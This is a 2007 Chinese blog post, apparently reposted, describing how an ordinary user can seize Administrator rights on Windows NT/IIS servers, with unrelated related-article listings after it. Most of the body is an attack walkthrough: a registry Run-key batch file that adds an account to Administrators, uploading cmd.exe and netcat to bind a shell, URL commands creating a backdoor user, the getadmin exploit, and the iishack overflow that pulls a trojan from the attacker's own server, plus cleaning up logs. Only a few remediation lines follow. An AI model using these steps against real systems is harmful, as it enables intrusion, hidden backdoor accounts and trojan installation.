获取NT的admin权限的方法

原创 2007年10月01日 11:06:00

涉及程序: 
NT server 

描述: 
一般用户获取NT服务器Admin权限的方法

详细: 
获取NT的admin权限的方法:
一、通过修改注册表
凡是具有登录NT本机的用户,例如IUSR_machine,都具有对 HKEY_LOCAL_MACHINE/SOFTWARE/MICROSOFT/WINDOWS/CurrentVersion/Run 项的可读可写权限,该用户可以远程访问这个项。比如,他可以创建一个bat文件,文件内容为: cmd.exe /c net localgroup administrators 
IUSR_machine /add,把该文件copy到winnt目录下,然后在注册表上述的项添加一个数值,指向这个文件。
那么,当下次Admin登录到该机器上时,就会自动把IUSR_machine添加到Administrators组。
另,注册表键HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/User Shell Folders/Common Startup 也可以这么做。

二、自建telnet服务在NT上执行指令
要求用户有文件上传权限,而且该目录位于web目录下,该目录允许执行
下面是具体步骤
假设你的目录是www.xxx.com/frankie
那么,把cmd.exe(位于C:/winnt/system32/cmd.exe)和Netcat里面包含的nc.exe传到这个目录上去,
然后,在浏览器端输入:
http://www.xxx.com/frankie/cmd.exe?/c%20nc.exe%20-l%20-p%2023%20-t%20-e%20cmd.exe
这时候,你的浏览器将停止不动,实际上,server上的Telnet的服务已经产生了:
这时,用Telnet连接www.xxx.com的23端口,你发现,不用密码,不用登陆,对方C:/提示符已经出现在你的眼前!更妙的是,这个Telnet server是一个一次性的服务,当客户端一退出,该服务也将终止.
Netcat不同于一般的特洛伊木马,它可以构建任何的TCP连接服务.在浏览器端输入上述的字符串,等价于在NT的Dos方式下输入: nc -l -p 23 -t 

-e cmd.exe 这将把cmd.exe绑定到23端口上

三、入侵NTserver典型途径V2.0
简介
1、如果你有NT/IIS服务器的任何一个帐号,哪怕是guest帐号,都可以获得root
2、用netcat和iishack可以获得root
3、iusr_计算机名这个帐号有ftp上传,web执行等权限.
4、在web server上执行程序是入侵NT的关键
5、要在web server上执行程序就先要上传文件到cgi-bin目录或者scripts目录等有执行权限的目录上去
在本文中,目标机器的名称是ntsvr2,目标机器的域名是www.xxx.com,目标机器上有scripts和cgi-bin目录,scripts目录下有uploadn.asp等asp

程序,可能有guest帐号,肯定有iusr_ntsvr2这个帐号:
第一个方法,用iusr_ntsvr2后者guest这两个帐号,这里假设我们已经破解了这个帐号的密码:
在浏览器输入:
http://www.xxx.com/scripts/uploadn.asp
guest和iusr_ntsvr2这两个帐号都可以进这个asp页面
在这里把文件getadmin和gasys.dll以及cmd.exe上传到/scripts目录.
然后输入:http://www.xxx.com/scripts/getadmin.exe?IUSR_ntsvr2
大约十多秒后屏幕显示:
CGI Error 
这时有90%的可能是:你已经把IUSR_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员
下面可以add user:
http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:/winnt/system32/net.exe%20user%20china%20news%20/add 
这样就创建了一个叫china用户,密码是news,然后:
http://www.xxx.com/scripts/getadmin.exe?china
第二个方法,用匿名ftp:
如果允许匿名帐号ftp登陆的设定,也给我们带来了突破NT server的机会。我们用ftp登陆一个NT server,比如:www.xxx.com(示例名):
ftp www.xxx.com
Connected to www.xxx.com
220 ntsvr2 Microsoft FTP Service (Version 3.0). 
ntsvr2这个东西暴露了其NETbios名,那么在IIS的背景下,必然会有一个IUSR_ntsvr2的用户帐号,属于Domain user组,这个帐号我们以后要用来

获取Administrator的权限
User (www.xxx.com:(none)):anonymous
331 Anonymous access allowed, send identity (e-mail name) as password. 
Password: 输入 guest@ 或者guest
对于缺乏网络安全知识的管理员来说,很多人没有将guest帐号禁止,或者没有设置密码。那么guest帐号就是一个可用的正确的用户帐号,虽然

只属于Domain guest组
在这种情况下我们就可以进NT server的ftp了。
进去以后,看看目录列表,试试 cd /scripts 或cgi-bin等关键目录,如果运气好,改变目录成功,这时你就有了80%的把握。
把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll传上去到cgi-bin
然后输入:http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_ntsvr2
大约十多秒后屏幕显示:
CGI Error 
这时有90%的可能是:你已经把IUSR_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员
下面可以add user:
http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:/winnt/system32/net.exe%20user%20china%20news%20/add 
这样就创建了一个叫china用户,密码是news,然后:
http://www.xxx.com/cgi-bin/getadmin.exe?china
或者
http://www.xxx.com/scripts/tools/getadmin.exe?china
你再用china的帐号登陆,就可以有最大的权限了,也可以用上面的cmd.exe的方法直接修改 如果没有cmd.exe,也可以自己传一个上去到

scripts/tools或者cgi-bin目录

第三个方法,用netcat和iishack
如果你熟悉使用Netcat这个工具,你就知道,netcat可以利用NT的弱点在其上绑定端口,下面用eEye的工具已经介绍过,如果你熟悉Netcat,成功的可能性会更大:

IIS的ISAPI的毛病(*.HTR) 我们再来看看eEye最近这两天发现的一个关于NT/IIS的问题和工具.在IIS的/Inetsrv目录下,有个DLL文件叫

ism.dll,这个模块在web运行的时候就被加载到较高的内存地址,并且导致了零字节问题到处出现
IIShack.asm ,利用这个毛病,eEye写了两个程序: 
iishack.exe
ncx99.exe,为达目的你必须自己有一个web server,把ncx99.exe和

netbus木马传到这个web server的目录下,比如你的web server是:
www.mysvr.com? 而对方的IIS server是www.xxx.com
则: iishack www.xxx.com 80 www.mysvr.com/ncx99.exe?? (注意,不要加http://字符!)
上述命令输入后这时你应该可以看到 
------(IIS 4.0 remote buffer overflow exploit)-----------------
(c) dark spyrit -- barns@eeye.com.
http://www.eEye.com
[usage: iishack <host> <port> <url> ]
eg - iishack www.xxx.com 80 www.mysvr.com/thetrojan.exe
do not include 'http://' before hosts!
---------------------------------------------------------------
Data sent!

然后,再把Netbus等特洛伊木马传到对方机器上去:
iishack www.example.com 80 www.myserver.com/netbus.exe
ncx99.exe实际上是有名的Netcat的变种,它把对方server的cmd.exe绑定到Telnet服务
ncx.exe 这是较早的版本,是把端口绑到80的,由于80端口跑web服

务,端口已经被使用.所以可能不一定有效
然后,用Telnet到对方的99或80端口:
Telnet www.xxx.com 99 
结果是这样:
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:/>[You have full access to the system, happy browsing :)]
C:/>[Add a scheduled task to restart inetinfo in X minutes]
C:/>[Add a scheduled task to delete ncx.exe in X-1 minutes]
C:/>[Clean up any trace or logs we might have left behind.]

这样,你就完全控制了其硬盘上的文件!注意,如果你type exit退出,对方server上的这个进程也会退出
参考资料: eeye.zip

补救方法:在IIS的www service属性中将主目录的应用程序设置的*.htr的映射删除
微软对这个问题的正式回应

其它:用Retina.exe得到NT域内的帐号清单,逐个尝试这些帐号,如果有的密码薄弱而被你猜出来,就可以用上面的方法来获取NT的admin
不明白的地方请看黑客世界最新更新的有关NT的系列文章
版权属于CCSDT&Frankie所有 

解决方案: 
控制一般用户对注册表Run项的可写权限
打最新的Services Pack  

版权声明:本文为博主原创文章,未经博主允许不得转载。

SQLServer 错误: 15404,无法获取有关 Windows NT 组/用户 'WIN-8IVSNAQS8T7\Administrator' 的信息,错误代码 0x534。 转+自我方法

百度了一下,出现的原因,装数据库之后更改了计算机名字 解决办法:SQL-安全性-登录名-找到原有的计算机用户组名称-然后改为现在的计算机用户组名称,重启SQL代理服务。执行成功。 错误: 15404,...
  • qq_32451793
  • qq_32451793
  • 2016年04月01日 09:30
  • 2462

Django中Admin管理与权限管理(三)————模块的鉴权操作

通知模块的鉴权操作 1.定义权限 这里需要给大家提的是,在我们新建模型完成之后,系统会自动的给这个模型定义三个权限。我们可以通过认证和授权中的组来进行查看。 如下图所示,我们可以看到默认添加的三...
  • chr23899
  • chr23899
  • 2016年07月19日 22:16
  • 7020

SQLServer 错误: 15404,无法获取有关 Windows NT 组/用户 'WIN【转】

 2013年08月27日   作者:张海城  被围观 [1134]+   核心提示:SQLServer 错误: 15404,无法获取有关 Windows NT 组/用户 'WIN...
  • yaozzuo
  • yaozzuo
  • 2014年05月29日 14:51
  • 3890

计划任务中使用NT AUTHORITY\SYSTEM用户和普通管理员用户有什么区别

原文地址:http://www.ynufe.edu.cn/metc/Article/ShowArticle.asp?ArticleID=805 系统管理员会碰到这样的问题,为什么在更...
  • shangzhihaohao
  • shangzhihaohao
  • 2011年12月20日 16:55
  • 17886

SQLServer 错误: 15404,无法获取有关 Windows NT 组/用户 MYPC/Administrator' 的信息,错误代码 0x534。 [SQLSTATE 42000] (ConnIsLoginSysAdmin)

SQLServer 错误: 15404,无法获取有关 Windows NT 组/用户 MYPC/Administrator' 的信息,错误代码 0x534。 [SQLSTATE 42000] (Con...
  • lanwilliam
  • lanwilliam
  • 2010年07月02日 10:16
  • 4492

django admin 后台权限管理设置

设置用户的权限主要通过修改auth_user表的各字段来实现: (https://docs.djangoproject.com/en/dev/ref/contrib/auth/) 下面是从官方文档...
  • wang1144
  • wang1144
  • 2014年02月17日 06:55
  • 2307

django 显示admin登录么有权限

去掉url.py的下面两行的注释:   from django.contrib import admin admin.autodiscover()
  • zj19880814
  • zj19880814
  • 2013年10月12日 14:15
  • 409

HBase admin用户权限不足

问题描述:用admin用户导出CTBase数据任务偶现失败,查看日志报错:Insufficient permissions for user 'admin' (table=_ctmeta_,actio...
  • OliverChrist
  • OliverChrist
  • 2017年10月17日 11:01
  • 249

Jeecg权限控制

Jeecg权限控制一、Jeecg权限涉及的概念 序号 内容 说明 1、 用户 具体登录的用户 2、 角色 一个访问权限的集合 3、 组织机构 一个部门的概...
  • niepan110
  • niepan110
  • 2016年08月04日 17:59
  • 1444

使用Shiro 集合Spring来实现权限控制

这只是笔记  web.xml中引入 spring-shiro.xml spring-shiro.xml :
  • u012280292
  • u012280292
  • 2016年06月16日 15:46
  • 3530
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:获取NT的admin权限的方法
举报原因:
原因补充:

(最多只允许输入30个字)